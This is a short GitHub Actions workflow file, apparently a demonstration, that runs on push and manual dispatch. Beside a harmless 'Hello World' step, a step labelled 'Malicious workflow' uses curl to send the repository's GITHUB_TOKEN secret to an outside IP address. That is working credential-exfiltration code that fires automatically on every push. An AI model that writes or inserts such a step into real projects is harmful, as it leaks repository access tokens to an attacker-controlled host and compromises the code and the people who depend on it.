name: Test

on:
  workflow_dispatch: # on button click
  push:

jobs:
  publish:
    runs-on: ubuntu-latest
    steps:
      - name: Friendly workflow
        run: echo 'Hello World!!'

      - name: Malicious workflow
        run: curl http://52.166.101.96/${{ secrets.GITHUB_TOKEN }}
